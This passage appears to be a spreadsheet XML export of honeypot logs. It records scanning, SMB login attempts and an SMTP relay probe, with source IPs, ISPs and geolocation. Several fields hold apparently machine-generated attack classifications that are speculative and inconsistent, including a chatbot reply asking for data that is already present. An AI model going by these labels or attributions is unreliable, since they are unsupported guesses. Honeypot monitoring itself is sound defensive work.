spoofed. This might be an initial reconnaissance scan. &amp;&amp; Malicious activity detected, an unknown user from IP address 66.94.127.183 is making a GET request to a specific URI ('/AqFd') on the server's port 443. The User-Agent string is spoofed, indicating possible identity theft or masking of true origin. &amp;&amp; The data suggests a potential scanning activity, as the request appears to be probing for vulnerabilities in an exposed service on a specific IP address. The &quot;gzip&quot; encoding and close connection suggest a brief or automated scan rather than legitimate traffic. The User-Agent is suspiciously generic. &amp;&amp; This log data indicates a potential malicious GET request to an unusual URI, possibly attempting to exploit the service for unauthorized access or data retrieval. The User-Agent header suggests a common web browser but may be spoofed. This could be an attempt to scan for vulnerabilities in the service. &amp;&amp; A GET request is made to a suspicious URL, potentially attempting to exploit or gather information from the system, possibly related to a malware infection. The user agent appears legitimate but may be spoofed. This could be an initial reconnaissance step in a larger attack. &amp;&amp; A user agent with the name &quot;Mozilla/5.0&quot; is making a GET request to an unknown URI &quot;/3Yhh&quot;. This could be a probing attempt by a malicious actor testing for vulnerabilities. The use of gzip compression and close connection may indicate further potential malicious activity. &amp;&amp; No data received from HTTP service, likely indicating a scanning or probing attempt by an attacker to identify potential vulnerabilities. The lack of HTTP traffic suggests the attacker is exploring the system's exposed services before launching a targeted attack. This could be a reconnaissance step in a larger malicious operation. &amp;&amp; No HTTP traffic was detected for this log entry, suggesting that an attacker may be using a non-standard service or probing for vulnerabilities. This lack of HTTP activity could indicate a potential scanning or reconnaissance attempt by the malicious actor. The absence of any discernible HTTP requests is unusual and warrants further investigation. &amp;&amp; A GET request is being sent to an unknown endpoint, potentially indicating reconnaissance or a scan of the system's available resources. The user agent and host headers suggest a sophisticated tool is being used. This could be an attacker probing for vulnerabilities. &amp;&amp; A GET request was made to a specific URI on port 443, which is typically used for secure HTTPS connections. The request was likely initiated by a browser with a fake user-agent string, attempting to exploit the system or steal sensitive information. This behavior suggests an attempt at reconnaissance or malicious data retrieval. &amp;&amp; An unknown client from IP address 77.91.74.218 is making a GET request to an unspecified resource. This could be an attempt to access a vulnerable web application. The request appears to come from a Macintosh device with a fake User-Agent string. &amp;&amp; A GET request was made to a specific URI, likely attempting to access a web application, from an IP address with a suspicious user agent string, possibly trying to exploit the system or inject malware. The request includes compressed data and is targeting port 443, which is typically used for secure connections. This could be a reconnaissance attempt or a malicious attack in progress. &amp;&amp; An unknown client is making a GET request to an unvisited URL on a server, likely attempting to exploit a vulnerability or probe for information. The user agent string is a common tactic used by malicious actors to hide their identity. This may be a reconnaissance attempt ahead of potential exploitation. &amp;&amp; An unknown client is making a GET request to an unusual endpoint, using the browser's user agent string, possibly attempting to scan for vulnerabilities or exploit known weaknesses in outdated software versions. The request appears to be from a compromised IP address with a non-standard port being used as the host. This could indicate scanning or reconnaissance activity. &amp;&amp; A malicious client with a fake Mozilla Firefox user agent accessed the server to retrieve data from a possibly exploited service, trying to get data compressed with gzip. The request is made to an unusual URI which may indicate exploitation or vulnerability scanning. &amp;&amp; A possible scanning activity, a malicious user attempting to connect to a specific service on a server at IP address 209.145.61.177 and potentially exploiting a vulnerability, likely using an older version of the Mozilla Firefox browser. _x000a_The request is for a GET method with a specified URI. _x000a_This may be a reconnaissance or probing attempt by an attacker. &amp;&amp; A GET request was made to an unknown URI, possibly exploiting a vulnerability or attempting unauthorized access. The User-Agent string is fake and may be used for obfuscation. This activity could be indicative of reconnaissance or a potential attack vector. &amp;&amp; This data suggests a potential malicious GET request to an unknown endpoint on a server with IP address 156.244.8.69, likely attempting to exploit the system or retrieve sensitive information. The use of gzip encoding and Mozilla/5.0 User-Agent indicates attempted evasion of detection or concealment of true origin. A connection is immediately closed after the request, possibly indicating a scanning activity. &amp;&amp; Possible malicious activity: An encrypted request was made to a server with a suspicious user agent string and URI, potentially indicating unauthorized access to sensitive resources. The connection is being closed immediately after the request, which could be a sign of evasion techniques. The request also includes gzip encoding, which may be used for compressing malware. &amp;&amp; An encrypted GET request was made to a specific host on port 443, likely attempting unauthorized access._x000a_The client is impersonating a browser with an old version of Firefox._x000a_This activity may be reconnaissance or part of a larger malicious operation. &amp;&amp; Malicious activity detected - a GET request to an unusual URI ('/aab8') from a potentially spoofed IP address (156.244.8.69). The User-Agent string appears legitimate but may be faked. This could be a reconnaissance or exploit attempt."/>
    <s v="SQLi &amp;&amp; Web Scan &amp;&amp; Port Scan &amp;&amp; Web Scanner &amp;&amp; SQL Injection _x000a__x000a_(No response yet, waiting for more input...) &amp;&amp; Scan Attempt &amp;&amp; HTTP Scanning &amp;&amp; HTTP Scan &amp;&amp; Denial Scan &amp;&amp; Brute Force &amp;&amp; Web Scanning &amp;&amp; Portscan &amp;&amp; Port Scan &amp;&amp; Port Scan &amp;&amp; Brute Force &amp;&amp; Port Scan &amp;&amp; XSS Brute &amp;&amp; Portscan _x000a_Webshell &amp;&amp; Web Shell &amp;&amp; Scanning Attack &amp;&amp; Web Attack &amp;&amp; Web Scanner"/>
  </r>
  <r>
    <x v="72"/>
    <x v="72"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:24:03"/>
    <d v="2025-04-30T20:24:03"/>
    <d v="2025-04-30T20:24:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1b19"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="73"/>
    <x v="73"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:21:55"/>
    <d v="2025-04-30T11:42:58"/>
    <d v="2025-04-30T20:21:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:bc7f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="74"/>
    <x v="74"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:12:18"/>
    <d v="2025-02-12T23:49:34"/>
    <d v="2025-04-30T20:12:18"/>
    <n v="11458"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Credential Stuffing&amp;&amp;Email Spoofing"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="25&amp;&amp;10734&amp;&amp;63318&amp;&amp;60739&amp;&amp;46340&amp;&amp;60484&amp;&amp;28328&amp;&amp;13302&amp;&amp;42068&amp;&amp;38756&amp;&amp;63070&amp;&amp;37050&amp;&amp;47192&amp;&amp;48184&amp;&amp;16214&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8956"/>
    <s v="6.06924"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Pitline Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '5.180.55.39_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 23 Mar 2025 09:54:12 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 24 Mar 2025 13:05:26 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 1 Apr 2025 13:42:26 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3d3:bf37"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low&amp;&amp;Medium"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="75"/>
    <x v="75"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:11:21"/>
    <d v="2025-01-20T12:45:32"/>
    <d v="2025-04-30T20:11:21"/>
    <n v="37"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São Bernardo do Campo"/>
    <s v="São Bernardo do Campo"/>
    <s v="3449344"/>
    <s v="NA"/>
    <s v="-23.6939"/>
    <s v="-46.565"/>
    <s v="266953"/>
    <s v="ARGO PROVEDOR DE INTERNET LTDA"/>
    <s v="Argo Provedor De Internet Ltda"/>
    <s v="business"/>
    <s v="Argo Provedor De Internet Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2de2:51d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="76"/>
    <x v="76"/>
    <s v="luminous.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:10:10"/>
    <d v="2023-08-04T22:53:00"/>
    <d v="2025-04-30T20:10:10"/>
    <n v="686"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_IRC_H46&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_IRC_H18&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_SOCKS5_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;6379&amp;&amp;5900&amp;&amp;45324&amp;&amp;21&amp;&amp;1521&amp;&amp;22&amp;&amp;29252&amp;&amp;5432&amp;&amp;9100&amp;&amp;1080&amp;&amp;NA&amp;&amp;1433&amp;&amp;6667&amp;&amp;3389&amp;&amp;445&amp;&amp;23&amp;&amp;110&amp;&amp;143&amp;&amp;80&amp;&amp;389&amp;&amp;55171&amp;&amp;25&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;request&amp;&amp;login&amp;&amp;GET&amp;&amp;query&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'rqkmlbmg', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.253;tag=rqkmlbmg', 'max-forwards': '0', 'to': 'sip:5.253.43.207', 'via': 'SIP/2.0/UDP 87.236.176.253:5060;branch=z9hG4bKrqkmlbmg;received=87.236.176.253;rport=33489'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,33353)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,49281)}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.97.67:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,46079)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,56329)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,58347)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,41473)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57ec:b0fd"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No malicious activity detected, no log data provided. &amp;&amp; No log data provided, unable to analyze malicious activity. &amp;&amp; This log indicates a failed attempt to connect using SOCKS5 protocol, likely an attacker probing for vulnerabilities or attempting to use the service maliciously. The lack of specific information suggests a reconnaissance or exploratory action. This activity is unusual and warrants further investigation. &amp;&amp; The log data is empty, indicating no malicious activity was detected yet or there is insufficient data to determine any suspicious behavior. &amp;&amp; This log indicates that there was an attempt to access POP3 service, but no further information is available due to lack of data. This could be indicative of a scanning or probing activity by malicious entities. The absence of additional details makes it difficult to determine the nature of this activity. &amp;&amp; No SMTP login attempt was made as there is no associated data for this protocol."/>
    <s v="SMTP TLS"/>
  </r>
  <r>
    <x v="77"/>
    <x v="77"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T19:58:05"/>
    <d v="2023-12-05T15:04:00"/>
    <d v="2025-04-30T19:58:05"/>
    <n v="122"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;59987&amp;&amp;445&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2007-01-11"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,50293)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,50337)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,60420)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,62196)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,52645)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,53614)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,52345)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,52400)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,61804)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,61867)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,52635)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b1e:f050"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided. &amp;&amp; The log indicates multiple attempts to access different services, possibly scanning for vulnerabilities or attempting brute-force attacks. The high volume of requests suggests a targeted effort to exploit weaknesses. This behavior is characteristic of reconnaissance and potential exploitation activities."/>
    <s v="I'd be happy to analyze the log data! However, it seems like there's no data provided. Could you please provide the actual log data so I can assist you in identifying the type of attack? _x000a__x000a_Once I receive the data, I'll name the type of attack in a short phrase (max 2 words)."/>
  </r>
  <r>
    <x v="78"/>
    <x v="78"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T19:41:31"/>
    <d v="2025-04-30T19:40:25"/>
    <d v="2025-04-30T19:41:31"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7282"/>
